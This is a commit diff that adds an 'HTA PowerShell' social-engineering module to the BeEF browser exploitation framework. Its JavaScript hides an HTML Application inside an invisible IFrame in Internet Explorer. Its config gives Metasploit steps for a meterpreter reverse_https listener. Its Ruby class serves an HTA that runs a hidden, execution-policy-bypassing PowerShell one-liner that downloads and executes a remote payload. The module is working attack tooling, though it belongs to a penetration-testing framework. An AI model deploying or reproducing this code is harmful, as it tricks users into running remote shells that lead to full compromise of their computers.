Added HTA-powershell client-side attack (IE only).

modules/social_engineering/hta_powershell/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+    var hta_url = '<%= @domain %>' + '<%= @mount_point %>';
+
+    if(beef.browser.isIE()){
+        // application='yes' is IE-only and needed to load the HTA into an IFrame.
+        // in this way you can have your phishing page, and load the HTA on top of it
+        beef.dom.createIframe('hidden', {'src':hta_url,'application':'yes'});
+        beef.net.send('<%= @command_url %>', <%= @command_id %>, 'HTA loaded into hidden IFrame.');
+    }
+});

modules/social_engineering/hta_powershell/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        hta_powershell:
+            enable: true
+            category: ["Social Engineering"]
+            name: "HTA PowerShell"
+            description: "Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame.<br> If the user allows execution, powershell is used to download the payload from a Metasploit handler and execute it.<br>Before launching the module, do the following on Metasploit:<br>use exploit/windows/misc/psh_web_delivery<br>set URIPATH /psh<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z"
+            authors: ["antisnatchor"]
+            target:
+                user_notify: ["IE"]
+                not_working: ["ALL"]

modules/social_engineering/hta_powershell/module.rb

@@ -0,0 +1,58 @@
+#
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Hta_powershell < BeEF::Core::Command
+
+  class Bind_hta < BeEF::Core::Router::Router
+    before do
+      headers 'Content-Type' => 'application/hta',
+              'Pragma' => 'no-cache',
+              'Cache-Control' => 'no-cache',
+              'Expires' => '0'
+    end
+
+    get '/' do
+      response['Content-Type'] = "application/hta"
+      payload_handler = settings.payload_handler
+      print_info "Serving HTA. Payload handler: #{payload_handler}"
+      "<script>
+          var c = \"cmd.exe /c powershell.exe -w hidden -nop -ep bypass -c \\\"\\\"IEX ((new-object net.webclient).downloadstring('#{payload_handler}'))\\\"\\\"\";
+          new ActiveXObject('WScript.Shell').Run(c);
+      </script>"
+    end
+  end
+
+  def pre_send
+
+    # gets the value configured in the module configuration by the user
+    @datastore.each do |input|
+      if input['name'] == "payload_handler"
+        @payload_handler = input['value']
+      end
+      if input['name'] == "mount_point"
+        @mount_point = input['value']
+      end
+    end
+
+    # mount the extension in the BeEF web server, calling a specific nested class (needed because we need a specifi content-type/disposition)
+    bind_hta = Hta_powershell::Bind_hta
+    bind_hta.set :payload_handler, @payload_handler
+    BeEF::Core::Server.instance.mount(@mount_point, bind_hta.new)
+    BeEF::Core::Server.instance.remap
+  end
+
+	def self.options
+		return [
+			{'name' => 'payload_handler', 'ui_label'=>'Payload Handler',  'value' =>'http://10.10.10.10:8080/psh'},
+      {'name' => 'mount_point', 'ui_label'=>'Mount point',  'value' =>'/hta'},
+      {'name' => 'domain', 'ui_label' => 'Serving Domain', 'value' => 'http://beef_domain.com'}
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end